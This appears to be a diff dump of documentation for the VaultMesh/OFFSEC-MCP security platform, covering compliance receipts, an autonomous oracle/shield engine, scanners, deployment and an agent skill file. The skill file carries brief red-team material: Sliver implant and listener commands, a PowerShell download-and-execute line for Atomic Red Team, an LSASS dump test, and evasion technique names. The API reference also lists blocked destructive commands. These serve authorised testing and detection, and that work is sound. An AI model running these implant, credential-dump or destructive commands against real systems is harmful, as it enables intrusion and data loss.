- Ed25519 signing library and key management.
- Optional OTS/BTC/ETH client libraries or APIs.
- OffSec MCP / VaultMesh services exposing proof tools.

View File

@@ -0,0 +1,72 @@
Page Title: Lawchain Compliance Ledger
Summary: Lawchain is the compliance-focused ledger that tracks regulatory obligations, oracle answers, and audit trails via receipts. It integrates with the proof system to ensure every compliance answer has a cryptographic backbone, and it is designed to speak the language of EU AI Act, GDPR, NIS2, and future frameworks.
Key Findings:
- Oracle answers are validated against a schema before being recorded.
- Each answer is hashed and bound into a receipt, linking legal semantics to proofs.
- Federation metrics allow multi-node Lawchain sync across the mesh.
- Policy evaluation is driven by JSON inputs and produces JSON results for downstream tools.
Components:
- Lawchain Core Ledger (append-only compliance scroll).
- Oracle Answer Validator (schema enforcement).
- Compliance Scroll store (receipt logs).
- Federation Metrics emitter.
- Policy Evaluator (rule engine).
Oracle Answer Schema (vm_oracle_answer_v1):
```json
{
"question": "string",
"answer_text": "string",
"citations": [{
"document_id": "string",
"framework": "string",
"excerpt": "string"
}],
"compliance_flags": {
"gdpr_relevant": true,
"ai_act_relevant": false,
"nis2_relevant": true
},
"gaps": ["string"],
"insufficient_context": false,
"confidence": "high"
}
```
Workflows / Pipelines:
- Compliance Q&A:
1. Operator (or system) asks Lawchain a question.
2. RAG/Retrieve context from policy docs and regulations.
3. LLM generates an answer draft.
4. Answer is validated against vm_oracle_answer_v1 schema.
5. Hash (Blake3 over canonical JSON) computed and receipt generated.
6. Receipt anchored via proof system and stored in Lawchain.
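An illustrative sketch of steps 4-5, assuming the `jsonschema` and `blake3` packages; the schema fragment below is a small stand-in for vm_oracle_answer_v1, and the answer content is fabricated for the example.
```python
#!/usr/bin/env python3
"""Validate an oracle answer and compute its receipt hash (subset of the real schema)."""
import json
from blake3 import blake3          # pip install blake3
from jsonschema import validate    # pip install jsonschema

ANSWER_SCHEMA = {                  # small stand-in for vm_oracle_answer_v1
    "type": "object",
    "required": ["question", "answer_text", "citations", "compliance_flags", "confidence"],
    "properties": {"insufficient_context": {"type": "boolean"}},
}

answer = {                         # fabricated example content for illustration only
    "question": "Does the backup flow meet GDPR storage limitation?",
    "answer_text": "Backups are retained per the documented schedule ...",
    "citations": [{"document_id": "gdpr", "framework": "GDPR", "excerpt": "Art. 5(1)(e) ..."}],
    "compliance_flags": {"gdpr_relevant": True, "ai_act_relevant": False, "nis2_relevant": False},
    "gaps": [],
    "insufficient_context": False,
    "confidence": "high",
}

validate(instance=answer, schema=ANSWER_SCHEMA)                                 # step 4
answer_hash = blake3(json.dumps(answer, sort_keys=True).encode()).hexdigest()   # step 5
print("answer_hash:", answer_hash)
```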
Metrics Files (examples under /tmp/):
| File | Purpose |
|-------------------------|----------------------------|
| lawchain_federate.out | Federation sync output |
| lawchain_federate.err | Federation errors |
| lawchain_metrics.out | Metrics/logging output |
| policy_eval_out.json | Policy evaluation results |
| policy_input.json | Policy evaluation input |
Security Notes:
- Answer hash computed as blake3(json.dumps(answer, sort_keys=True)).
- Receipts bind answer content, timestamps, and possibly node identity.
- gaps and insufficient_context prevent fake certainty in legal answers.
- Citations must reference real sources, enabling audit of answer provenance.
Compliance Frameworks Tracked:
- GDPR: data protection and subject rights.
- EU AI Act: risk classification, obligations, and logs.
- NIS2: network and information security.
- Custom extensions can map additional frameworks (e.g., SOC2, ISO 27001).
Dependencies:
- Lawchain service.
- Oracle corpus indexed (policies, regulations, internal docs).
- Blake3 and JSON schema validator.
- Integration with VaultMesh proof spine for receipts and anchoring.

View File

@@ -0,0 +1,83 @@
Page Title: Oracle Engine & Shield Defense (TEM Stack)
Summary: The Oracle Engine provides structured reason → decide → act chains, while Shield and TEM form the defensive veil. Together they detect threats, log them to the proof system, and (optionally) orchestrate responses across shield-vm, lab nodes, and the wider mesh.
Key Findings:
- Oracle chains decisions through explicit reasoning steps, not opaque actions.
- Every significant decision can emit receipts into the proof spine.
- Shield monitors multiple vectors (network, process, file, device, etc.).
- Response levels span from passive logging to active isolation or countermeasures.
- Agent tasks allow scheduled or triggered operations (e.g., periodic scans).
Components:
- Oracle Reasoning Engine.
- Oracle Decision System.
- Tactical Chain Executor.
- Shield Monitor (sensors).
- Shield Responder (actions).
- TEM daemon (threat transmutation logic).
- Agent Task Scheduler.
Oracle Tools:
| Tool | Purpose |
|------------------------|--------------------------------------|
| oracle_status | Node status and capabilities |
| oracle_reason | Analyze situation, propose actions |
| oracle_decide | Make autonomous decision |
| oracle_tactical_chain | Full reason → decide → act chain |
Oracle Tactical Chain Flow:
1. **Context**: Collect current state (logs, metrics, alerts, lawchain state).
2. **Reason**: `oracle_reason` produces candidate actions with justifications.
3. **Decide**: `oracle_decide` selects an action based on risk tolerance and constraints.
4. **Act**: Execute playbooks, or keep in dry-run mode for simulation.
5. **Prove**: Generate a receipt and anchor via proof system (optional but recommended).
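A dry-run driver for this flow might look like the sketch below; `call_tool()` is a hypothetical stand-in for one MCP client round-trip, the option strings are placeholders, and the argument shapes follow the tool descriptions rather than verified code.
```python
#!/usr/bin/env python3
"""Dry-run driver for the reason -> decide -> act chain; call_tool() is a hypothetical MCP helper."""

def call_tool(name: str, arguments: dict) -> dict:
    """Placeholder for one MCP tools/call round-trip to the offsec-mcp server."""
    raise NotImplementedError

def tactical_chain(context: str, objective: str) -> dict:
    reason = call_tool("oracle_reason", {
        "context": context,
        "objective": objective,
        "constraints": ["read-only", "no destructive actions"],
    })
    decide = call_tool("oracle_decide", {
        "situation": context,
        "options": ["Run diagnostic playbook", "Escalate to operator", "Take no action"],
        "risk_tolerance": "low",
    })
    plan = call_tool("tactical_playbook", {"playbook": "mesh-health-check", "dry_run": True})
    proof = call_tool("proof_generate", {
        "action": "oracle_tactical_chain",
        "data": {"reason": reason, "decision": decide, "plan": plan},
    })
    return {"reason": reason, "decision": decide, "plan": plan, "proof": proof}
```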
Shield Monitor Vectors:
| Vector | Detection Capability |
|-----------|--------------------------------|
| network | Port scans, unusual flows |
| wifi | Rogue APs, deauth attempts |
| bluetooth | Device enumeration/anomalies |
| usb | Storage/HID abuse |
| process | Suspicious binaries, behavior |
| file | Unauthorized modifications |
Shield Response Levels:
| Level | Action |
|---------|----------------------------------------|
| log | Record event only |
| alert | Notify operator (Slack/email/etc.) |
| block | Prevent connection/action |
| isolate | Quarantine node/container/service |
| counter | Active response (e.g., honeypots) |
Agent Tasks:
```json
{
"name": "scheduled_scan",
"trigger": {
"type": "schedule",
"config": {"cron": "0 */6 * * *"}
},
"actions": [
{"tool": "shield_monitor", "args": {"vectors": ["network", "wifi"]}},
{"tool": "oracle_tactical_chain", "args": {"dry_run": true}}
],
"on_complete": "mesh_broadcast"
}
```
Security Notes:
- Dry-run mode is default for dangerous operations; production actions require explicit opt-in.
- Risk tolerance levels gate what Shield/TEM may do without human approval.
- All automated decisions can be bound to receipts for post-incident audit.
MCP / Mesh Tools:
- oracle_status, oracle_reason, oracle_decide, oracle_tactical_chain
- shield_status, shield_monitor, shield_respond
- Agent task management: agent_task, agent_list, agent_cancel
Dependencies:
- OffSec MCP server running on shield-vm/lab nodes.
- Proof system enabled for Oracle and Shield receipts.
- Integrations with metrics (Prometheus) and observability (Grafana).

View File

@@ -0,0 +1,87 @@
Page Title: AppSec Toolchain (Shield / CI Integration)
Summary: VaultMesh uses an integrated application security toolchain rooted on shield-vm and CI pipelines. It combines vulnerability scanning, secret detection, SBOM generation, and IaC analysis into a coherent flow, with findings eligible to be logged into the proof spine for high-risk assets.
Key Findings:
- Nuclei, Trivy, Semgrep, TruffleHog, Gitleaks, Checkov, Syft, and Grype cover distinct layers.
- shield-vm is the natural home for heavy security scans and OffSec tooling.
- CI pipelines can call out to shield-vm or run scanners directly in job containers.
- Secret detection runs in both pre-commit and CI stages for defense-in-depth.
- SBOM generation and vulnerability scanning support long-term supply chain tracking.
Components:
- Nuclei (web and service vuln scanning).
- Trivy (container/filesystem/SBOM vulnerability scanner).
- Semgrep (static code analysis).
- TruffleHog / Gitleaks (secret discovery).
- Checkov (IaC misconfiguration scanner).
- Syft (SBOM generator).
- Grype (vulnerability scanner against SBOMs).
Tool Capabilities:
| Tool | Target Types | Output |
|------------|----------------------------|-------------------------|
| nuclei | URLs, IPs, domains | Findings by severity |
| trivy | Images, dirs, repos, SBOMs | CVEs, secrets, configs |
| semgrep | Source code directories | Security findings |
| trufflehog | Git, S3, GCS, etc. | Verified secrets |
| gitleaks | Git repos, filesystems | Secret locations |
| checkov | Terraform, K8s, Helm, etc. | Misconfigurations |
| syft | Images, dirs, archives | CycloneDX/SPDX SBOM |
| grype | Images, dirs, SBOMs | Vulnerability list |
Example Scans:
Nuclei Web Scan:
```json
{
"targets": ["https://example.com"],
"severity": ["high", "critical"],
"tags": ["cve", "rce"]
}
```
Trivy Container Scan:
```json
{
"target": "vaultmesh-core:latest",
"scan_type": "image",
"scanners": ["vuln", "secret"],
"severity": ["HIGH", "CRITICAL"]
}
```
Secret Detection:
```json
{
"target": "/srv/git/vaultmesh",
"source_type": "git",
"only_verified": true
}
```
MCP Tools:
- offsec_appsec_nuclei_scan
- offsec_appsec_trivy_scan
- offsec_appsec_semgrep_scan
- offsec_appsec_trufflehog_scan
- offsec_appsec_gitleaks_scan
- offsec_appsec_checkov_scan
- offsec_appsec_syft_sbom
- offsec_appsec_grype_scan
Workflows:
1. SBOM Pipeline: Syft → produce CycloneDX JSON → Grype → vulnerability report.
2. Pre-merge Scans: CI job runs Semgrep, Trivy, Gitleaks on merge requests.
3. Periodic Deep Scans: shield-vm runs scheduled AppSec scans, logging high-severity findings.
4. Policy Integration: High-severity or critical findings feed into Lawchain/Lawchain-like policies.
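For the SBOM pipeline in workflow 1, a small wrapper might look like the following sketch; the Syft and Grype invocations assume current CLI flags (`-o cyclonedx-json`, the `sbom:` source prefix, `--fail-on`) and should be checked against the installed versions.
```python
#!/usr/bin/env python3
"""SBOM pipeline sketch: Syft emits CycloneDX JSON, Grype scans the SBOM."""
import pathlib
import subprocess
import sys

def sbom_pipeline(target_dir: str, sbom_path: str = "sbom.cdx.json") -> int:
    # Step 1: generate a CycloneDX SBOM for the target directory.
    sbom = subprocess.run(
        ["syft", f"dir:{target_dir}", "-o", "cyclonedx-json"],
        capture_output=True, text=True, check=True,
    ).stdout
    pathlib.Path(sbom_path).write_text(sbom)
    # Step 2: scan the SBOM; exit code is non-zero when findings reach the threshold.
    return subprocess.run(
        ["grype", f"sbom:{sbom_path}", "-o", "json", "--fail-on", "high"],
    ).returncode

if __name__ == "__main__":
    sys.exit(sbom_pipeline(sys.argv[1] if len(sys.argv) > 1 else "."))
```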
Security Notes:
- Nuclei and Trivy should be rate-limited when targeting external assets.
- Secret detection in CI uses only_verified where possible to reduce noise.
- Baseline files can exclude accepted findings while still tracking new issues.
- AppSec findings for high-value systems may be recorded as receipts in the proof system.
Dependencies:
- offsec-mcp server with tools installed (on shield-vm or lab nodes).
- Network access for pulling scanner templates and vulnerability databases.
- CI integration (GitLab pipelines on gate-vm) to trigger scans automatically.

View File

@@ -0,0 +1,85 @@
Page Title: Forge Flow — From Phone to Shield
Summary: The Forge Flow describes how code moves from the Sovereign's phone and forge node (nexus-0) through GitLab on gate-vm, into CI, and finally onto shield-vm and lab nodes. It is the canonical "path of sovereign code".
Key Findings:
- Primary forge is nexus-0 (BlackArch), reachable via Tailscale from Android/laptop.
- vaultmesh repo lives on nexus-0 under `/root/work/vaultmesh`.
- Git remote points to GitLab on gate-vm (gitlab.mesh.local).
- GitLab CI handles lint → test → build → deploy.
- Production-like deployments land on shield-vm; experiments land on Lab HV nodes.
Forge Flow Diagram (Text):
```text
Android / Laptop
↓ (Tailscale SSH)
nexus-0 (BlackArch forge)
↓ (git push)
GitLab @ gate-vm (mesh-core-01)
↓ (CI: lint → test → build)
shield-vm (Shield / TEM) and Lab HV (phoenix-01, etc.)
```
Steps:
1. Inception (Connect to Forge)
- From Android or laptop:
```bash
ssh VaultSovereign@100.67.39.1 # nexus-0 via Tailscale
tmux attach -t sovereign || tmux new -s sovereign
```
2. Forge (Edit & Test)
- On nexus-0:
```bash
cd /root/work/vaultmesh
nvim .
python3 -m pytest tests/ -v
python3 cli/vm_cli.py guardian status
python3 cli/vm_cli.py console sessions
```
3. Transmit (Git Push to GitLab)
```bash
git add -A
git commit -m "feat(guardian): improve anchor receipts"
git push origin main # or feature branch
```
4. Transform (GitLab CI on gate-vm)
- .gitlab-ci.yml stages:
- lint: style and basic checks.
- test: pytest and CLI tests.
- build: container/image build.
- deploy: optional manual or automatic deployment.
5. Manifest (Deploy to Shield or Lab)
- CI deploy job:
- For main: deploy to shield-vm (production-like).
- For lab branches: deploy to lab-mesh-01 / phoenix-01.
- Manual deploy (fallback):
```bash
ssh shield-vm
cd /opt/vaultmesh
git pull
sudo systemctl restart vaultmesh-mcp vaultmesh-tem
```
6. Observe (Metrics & Proofs)
- Grafana dashboards (gate-vm) for system and proof metrics.
- Guardian CLI for roots and scrolls.
- Lawchain/oracle dashboards for compliance view.
Infrastructure Roles in the Flow:
- nexus-0 → live forge, fast iteration, experiments.
- gate-vm → GitLab + CI + registry + observability.
- shield-vm → OffSec/TEM node and primary runtime for security engines.
- Lab HV → ephemeral experimentation environment.
Security Notes:
- SSH access to nexus-0 and shield-vm uses per-node ed25519 keys.
- GitLab access uses HTTPS with tokens or SSH keys.
- Deploy stage should be limited to trusted runners/tags.
Linked Assets:
- vaultmesh/.gitlab-ci.yml (CI pipeline).
- VAULTMESH-INFRA-OVERVIEW style documents.

Binary file not shown.

BIN
VaultMesh_Catalog_v1/skill/.DS_Store vendored Normal file

Binary file not shown.

Binary file not shown.

View File

@@ -0,0 +1,342 @@
---
name: sovereign-operator
description: Unified security operations framework combining OFFSEC-MCP (28 MCP tools), VaultMesh architecture, and Advanced Security Labs. Use when operating Shield nodes, invoking MCP tools (proof, mesh, shield, tactical, oracle, chain, recon, agent, mobile), managing VaultMesh subsystems, executing adversary emulation (Caldera, Atomic Red Team), writing Sigma rules, running C2 frameworks (Cobalt Strike, Sliver, Havoc), performing DFIR investigations, conducting purple team exercises, managing braid relationships, or operating in specialized domains (AD, cloud, K8s, mobile, wireless, OT/ICS, API). Triggers on "shield status", "mesh alerts", "tactical execute", "oracle reason", "recon passive", "spawn subsystem", "anchor root", "invoke Tem", "run atomic test", "write sigma rule", "C2 setup", "incident response", or any security operations workflow.
---
# 🜄 Sovereign Operator
Unified framework for security operations, combining:
- **OFFSEC-MCP** — 28 MCP tools across 9 categories
- **VaultMesh** — Self-evolving infrastructure with cryptographic proofs
- **Security Labs** — Adversary emulation, detection engineering, DFIR, and domain expertise
## Mental Model
```
┌─────────────────────────────────────────────────────────────┐
│ SOVEREIGN OPERATOR │
├─────────────────────────────────────────────────────────────┤
│ Brain │ oracle_*, chain │ Reason → Decide → Act │
│ Eyes/Ears │ mesh_*, recon_* │ Observe environment │
│ Spine │ shield_*, agent_* │ Defend + Automate │
│ Hands │ tactical_* │ Execute commands │
│ Memory │ proof_* │ Cryptographic receipts │
├─────────────────────────────────────────────────────────────┤
│ Red Team │ C2, evasion, persistence, lateral movement │
│ Blue Team │ DFIR, Sigma rules, EDR, SIEM correlation │
│ Purple Team │ Adversary emulation, BAS, ATT&CK coverage │
│ VaultMesh │ Subsystems, anchoring, Tem, alchemical cycles│
└─────────────────────────────────────────────────────────────┘
```
## Tool Categories (28 tools / 9 categories)
| Category | Tools | Purpose |
|----------|-------|---------|
| proof | 3 | `proof_generate`, `proof_verify`, `proof_anchor` |
| mesh | 6 | `mesh_console_ping`, `mesh_status`, `mesh_topology`, `mesh_alerts`, `mesh_backups`, `mesh_blast_radius` |
| shield | 3 | `shield_status`, `shield_monitor`, `shield_respond` |
| tactical | 3 | `tactical_execute`, `tactical_playbook`, `tactical_learn` |
| oracle | 2 | `oracle_reason`, `oracle_decide` |
| chain | 1 | `oracle_tactical_chain` (reason→decide→act) |
| recon | 3 | `recon_passive`, `recon_active`, `recon_wifi` |
| agent | 5 | `agent_task`, `agent_list`, `agent_cancel`, `agent_reload_configs`, `agent_config_toggle` |
| mobile | 2 | `mobile_status`, `mobile_execute` |
**Full API:** See `references/api.md`
## Quick Start Sequences
### Health Check
```json
{"tool": "mobile_status", "input": {"include": ["battery", "wifi", "vpn"]}}
{"tool": "mesh_console_ping", "input": {}}
{"tool": "mesh_status", "input": {"include_health": true}}
{"tool": "shield_status", "input": {"include_mesh": true}}
```
### Reason → Decide → Act
```json
{
"tool": "oracle_tactical_chain",
"input": {
"context": "2 unhealthy services, latency elevated",
"constraints": ["read-only", "no destructive actions"],
"objective": "Diagnose and stabilize",
"risk_tolerance": "low",
"dry_run": true
}
}
```
### Passive Reconnaissance
```json
{"tool": "recon_passive", "input": {"target": "example.com", "modules": ["dns", "whois", "certs"]}}
```
### Create Scheduled Agent
```json
{
"tool": "agent_task",
"input": {
"name": "mesh_heartbeat",
"trigger": {"type": "schedule", "interval": 120},
"actions": [{"tool": "mesh_status", "args": {}}, {"tool": "shield_status", "args": {}}],
"on_complete": "log"
}
}
```
## VaultMesh Architecture
VaultMesh operates as a **dual-layer civilization**:
### Layer 1: Kubernetes (The Flesh)
Six organs: 🜄 Governance, 🜂 Automation, 🜃 Treasury, 🜁 Federation, 🜏 Ψ-Field, 🌍 Infrastructure
### Layer 2: Rust Codex (The Soul)
`vm-core`, `vm-cap`, `vm-receipts`, `vm-proof`, `vm-treasury`, `vm-crdt`, `vm-guardian`, `vm-portal`
### Subsystem Spawning
```bash
python3 scripts/spawn_subsystem.py --name threat-analyzer --organ-type psi-field --rust
```
### Multi-Chain Anchoring
```bash
python3 scripts/compute_merkle_root.py --root vaultmesh-architecture --out manifests/hash-manifest.json
bash scripts/multi_anchor.sh manifests/hash-manifest.json
```
**Full VaultMesh details:** See `references/vaultmesh.md`
## Braid Mode — Mutual Attestation
Shield and VaultMesh **braid** by importing foreign Merkle roots:
```json
{"tool": "proof_braid_import", "input": {"url": "http://vaultmesh:9110/api/proof/root", "ledger_name": "vaultmesh"}}
```
| State | Meaning |
|-------|---------|
| none | No foreign roots |
| one_way | Only one side captured |
| bidirectional | Both captured at least one root |
| verified | Bidirectional + no regressions |
| Incident | Severity | Response |
|----------|----------|----------|
| `ROOT_REGRESSION` | CRITICAL | Freeze trust, coordinate with foreign operator |
| `PROOF_COUNT_REGRESSION` | CRITICAL | Same as above |
| `IDENTITY_SHIFT` | CRITICAL | Treat as new ledger unless pre-approved |
**Full braid specification:** See `references/braid.md`
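As a rough sketch of how these invariants can be checked on import: compare a freshly fetched foreign root against the last one recorded. Field names (`node_id`, `proof_count`, `root`) and the exact classification rules are illustrative assumptions, not the braid specification.
```python
#!/usr/bin/env python3
"""Toy braid invariant check against the last foreign root seen (rules and fields are illustrative)."""

def classify(previous: dict | None, current: dict) -> str:
    if previous is None:
        return "FIRST_IMPORT"
    if current["node_id"] != previous["node_id"]:
        return "IDENTITY_SHIFT"            # treat as a new ledger unless pre-approved
    if current["proof_count"] < previous["proof_count"]:
        return "PROOF_COUNT_REGRESSION"    # CRITICAL: freeze trust
    if current["proof_count"] == previous["proof_count"] and current["root"] != previous["root"]:
        return "ROOT_REGRESSION"           # CRITICAL: same count but a different root
    return "OK"

last_seen = {"node_id": "vaultmesh", "proof_count": 120, "root": "ab12"}
incoming  = {"node_id": "vaultmesh", "proof_count": 118, "root": "cd34"}
print(classify(last_seen, incoming))       # -> PROOF_COUNT_REGRESSION
```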
## Red Team Operations
### C2 Frameworks
| Framework | Type | Key Features |
|-----------|------|--------------|
| Cobalt Strike | Commercial | Beacon, Malleable C2, Aggressor |
| Sliver | Open Source | mTLS, WireGuard, multiplayer |
| Havoc | Open Source | Demon agents, stack duplication |
| Brute Ratel C4 | Commercial | EDR evasion, syscall obfuscation |
| Mythic | Open Source | Web UI, multi-agent support |
### Sliver Quick Start
```bash
sliver-server # Start server
generate --mtls 192.168.1.100 --os windows --arch amd64 --save implant.exe
mtls --lhost 0.0.0.0 --lport 8888 # Start listener
```
### Evasion Techniques
- AMSI bypass, ETW patching, unhooking
- Direct syscalls, API hashing
- Sleep obfuscation, stack spoofing
**Full Red Team details:** See `references/redteam.md`
## Blue Team Operations
### DFIR Framework (NIST 800-61r3 + CSF 2.0)
1. **Govern** — IR policies, roles, governance
2. **Identify** — Asset inventory, risk assessment
3. **Protect** — Safeguards, forensic readiness
4. **Detect** — Monitor, anomaly detection, triage
5. **Respond** — Containment, eradication, evidence
6. **Recover** — Restore, lessons learned
### Sigma Rule Development
```yaml
title: LSASS Memory Dump via Procdump
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\procdump.exe'
CommandLine|contains: 'lsass'
condition: selection
level: high
```
### Sigma Conversion
```bash
sigma convert -t splunk -p sysmon rule.yml
sigma convert -t lucene -p ecs_windows rule.yml
```
**Full Blue Team details:** See `references/blueteam.md`
## Purple Team Operations
### Adversary Emulation Frameworks
| Framework | Description |
|-----------|-------------|
| MITRE Caldera | Automated adversary emulation, 527+ procedures |
| Atomic Red Team | 1,225+ tests, 261 techniques, agentless |
| Infection Monkey | Breach simulation, lateral movement |
| PurpleSharp | AD-focused, .NET-based |
### Caldera Setup
```bash
git clone https://github.com/mitre/caldera.git --recursive
pip3 install -r requirements.txt
python3 server.py --insecure # http://localhost:8888
```
### Atomic Red Team Execution
```powershell
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics
Invoke-AtomicTest T1003.001 -ShowDetails # LSASS dump
Invoke-AtomicTest T1003.001 -TestNumbers 1
Invoke-AtomicTest T1003.001 -Cleanup
```
### BAS Platforms
- Picus Security, Cymulate, AttackIQ, SafeBreach, XM Cyber
**Full Purple Team details:** See `references/purpleteam.md`
## Specialized Domains
| Domain | Key Topics |
|--------|------------|
| Active Directory | Kerberoasting, DCSync, Golden/Silver tickets, BloodHound |
| Cloud Security | AWS/Azure/GCP misconfigs, CSPM, CNAPP |
| Container/K8s | Pod escape, RBAC abuse, supply chain |
| Mobile Security | Android/iOS testing, Frida, Objection |
| Wireless | WPA3 attacks, rogue AP, deauth |
| Bluetooth/IoT | BLE sniffing, firmware analysis |
| OT/ICS | SCADA, Modbus, IEC 62443 |
| API Security | OWASP API Top 10, GraphQL, JWT |
**Full domain details:** See `references/domains.md`
## Response Patterns
### "Check status" / "What's the health?"
`mobile_status` + `mesh_status` + `shield_status`
### "Analyze this situation"
`oracle_reason` or `oracle_tactical_chain`
### "Run recon on target"
`recon_passive` (DNS/WHOIS) or `recon_active` (requires auth)
### "Test detection for T1003"
→ Atomic Red Team: `Invoke-AtomicTest T1003.001`
### "Write a Sigma rule for X"
→ Generate YAML with logsource/detection/condition
### "Spawn a new subsystem"
`spawn_subsystem.py` with organ type
### "Anchor current state"
`compute_merkle_root.py` + `multi_anchor.sh`
### "Invoke Tem against threat"
`invoke_tem.py` with threat type and remediation
### "Set up C2 infrastructure"
→ Sliver/Cobalt Strike/Havoc setup per `references/redteam.md`
### "Investigate incident"
→ DFIR workflow per `references/blueteam.md`
## Alchemical Transformation Cycle
When the system must evolve:
1. **🜃 Nigredo (Blackening)** — Audit, isolate problems
2. **🜁 Albedo (Whitening)** — Restore from proof, purge invalid data
3. **🜂 Citrinitas (Yellowing)** — Extract patterns, synthesize defenses
4. **🜄 Rubedo (Reddening)** — Deploy improvements, anchor new state
**Triggers:** Threat detection, stagnation, audit findings, upgrade requests
## Tem — The Remembrance Guardian
Invoked when threats are detected. Transmutes attacks into evolutionary catalysts.
**Threat Types:** `integrity-violation`, `capability-breach`, `treasury-exploit`, `dos-attack`, `injection`
```bash
python3 scripts/invoke_tem.py --threat-type integrity-violation --realm demo --auto-remediate
```
## Safety Guardrails
- **tactical_execute:** Risk classification, blocks destructive commands in safe_mode
- **recon_active:** Requires `authorization` parameter
- **All high-impact tools:** Emit cryptographic proofs
- **Braid invariants:** Monotonic time, non-decreasing proof counts
## Forbidden Patterns
**Never:**
- Execute destructive commands without authorization
- Skip proofs for high-impact actions
- Accept regressed roots in braid mode
- Run active recon without auth ticket
- Skip alchemical phases in evolution
**Always:**
- Emit proofs for significant actions
- Respect braid invariants
- Use safe_mode for tactical operations
- Document in LAWCHAIN for governance events
- Apply sacred ratios (φ, π, e) in scaling decisions
## Environment
```bash
VAULTMESH_ENDPOINT=http://100.80.246.127:9090
OLLAMA_HOST=http://localhost:11434
OLLAMA_MODEL=qwen2.5:7b
SOVEREIGN_NODE_ID=shield-01
OFFSEC_MODE=full # full|demo|offline|test
```
## MCP Resources
- `sovereign://node/identity` — Node ID
- `sovereign://mesh/status` — Mesh health
- `sovereign://proofs/log` — Proof log
- `sovereign://agent/tasks` — Agent tasks
- `sovereign://shield/threats` — Threat history
## References
- `references/api.md` — Full MCP tool API (28 tools)
- `references/vaultmesh.md` — Architecture, subsystems, anchoring, Tem
- `references/braid.md` — Mutual attestation specification
- `references/redteam.md` — C2 frameworks, evasion, persistence, OPSEC
- `references/blueteam.md` — DFIR, Sigma rules, detection engineering
- `references/purpleteam.md` — Adversary emulation, BAS, ATT&CK coverage
- `references/domains.md` — AD, cloud, K8s, mobile, wireless, OT/ICS, API

View File

@@ -0,0 +1,387 @@
# OFFSEC-MCP API Reference
**28 tools across 9 categories** — All invoked via MCP `tools/call` with `name` and `arguments`.
---
## 1. Proof Tools (3)
Cryptographic receipts for auditability.
### `proof_generate`
Generate cryptographic proof/receipt for an action.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `action` | string | Yes | Action being proven |
| `data` | object | No | Data to include in proof |
| `witnesses` | string[] | No | Required witnesses |
**Returns:** `{ proof_id, hash, timestamp, action, data }`
### `proof_verify`
Verify a proof/receipt.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `proof_id` | string | No | Proof ID to verify |
| `proof_data` | object | No | Raw proof data |
**Returns:** `{ valid: true/false, proof, reason }`
### `proof_anchor`
Anchor proof to blockchain (simulated).
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `proof_id` | string | Yes | Proof ID to anchor |
| `chain` | string | No | `btc`, `eth`, or `mesh` (default: mesh) |
**Returns:** `{ anchored: true, chain, tx_id }`
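All three proof tools ride on the standard MCP `tools/call` request; a minimal sketch of the wire payload for `proof_generate` is shown below, with transport and client plumbing omitted and the action/data values chosen purely as examples.
```python
#!/usr/bin/env python3
"""Wire shape of an MCP tools/call request for proof_generate (transport/client plumbing omitted)."""
import json

request = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
        "name": "proof_generate",
        "arguments": {
            "action": "shield_monitor_enabled",                     # example action label
            "data": {"vectors": ["network", "wifi"], "sensitivity": "high"},
        },
    },
}
print(json.dumps(request, indent=2))
```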
---
## 2. Mesh Tools (6)
Prometheus-backed infrastructure intelligence.
### `mesh_console_ping`
Check if VaultMesh/Prometheus is reachable.
**No parameters.** Returns: `{ reachable: true/false, endpoint, latency_ms }`
### `mesh_status`
Get full infrastructure status and health.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `include_health` | boolean | No | Include detailed health (default: true) |
**Returns:** `{ services: [...], healthy_count, unhealthy_count, overall_status }`
### `mesh_topology`
Get mesh network topology with health overlay.
**No parameters.** Returns: `{ nodes: [...], edges: [...], service_dependencies }`
### `mesh_alerts`
Get active alerts from mesh.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `severity` | string | No | `all`, `critical`, `warning`, `info` |
**Returns:** `{ alerts: [...], count, by_severity }`
### `mesh_backups`
Get backup status and freshness.
**No parameters.** Returns: `{ backups: [...], last_successful, any_failed }`
### `mesh_blast_radius`
Calculate blast radius for a service failure.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `service_id` | string | Yes | Service to analyze (`portal`, `postgres`, `minio`) |
**Returns:** `{ service_id, affected_services: [...], impact_level }`
---
## 3. Shield Tools (3)
Mesh-aware defensive monitoring.
### `shield_status`
Get defensive shield status with aggregated threat intelligence.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `include_mesh` | boolean | No | Include mesh alerts/health (default: true) |
| `include_history` | boolean | No | Include recent threat history (default: false) |
**Returns:** `{ overall_state, mesh_status, threats, monitors, backups }`
### `shield_monitor`
Configure threat monitoring for attack vectors.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `vectors` | string[] | No | `network`, `wifi`, `bluetooth`, `usb`, `process`, `file`, `mesh` |
| `sensitivity` | string | No | `low`, `medium`, `high`, `paranoid` |
| `duration` | number | No | Seconds (0 = indefinite) |
**Returns:** `{ monitoring: true, vectors, sensitivity, expires_at }`
### `shield_respond`
Configure automatic response rules.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `threat_type` | string | Yes | `network_scan`, `mesh_alert`, `process_anomaly` |
| `response` | string | Yes | `log`, `alert`, `block`, `isolate`, `counter`, `trigger_agent` |
| `auto_execute` | boolean | No | Execute without confirmation |
| `notify_mesh` | boolean | No | Broadcast to mesh network |
**Returns:** `{ rule_id, threat_type, response, active: true }`
---
## 4. Tactical Tools (3)
Controlled command execution and playbooks.
### `tactical_execute`
Execute command with risk analysis and optional safe mode.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `command` | string | Yes | Command to execute |
| `explain` | boolean | No | Explain before execution (default: true) |
| `safe_mode` | boolean | No | Require confirmation for dangerous (default: true) |
| `timeout` | number | No | Timeout in ms (default: 60000) |
**Returns:** `{ command, risk_level, output, stderr, exit_code, proof_id }`
**Blocked in safe_mode:** `rm -rf /`, `dd if=/dev/zero`, `mkfs`, fork bombs
### `tactical_playbook`
Execute a structured sequence of tool calls.
| Parameter | Type | Required | Description |
|-----------|------|----------|-------------|
| `playbook` | string | Yes | Playbook name or path |
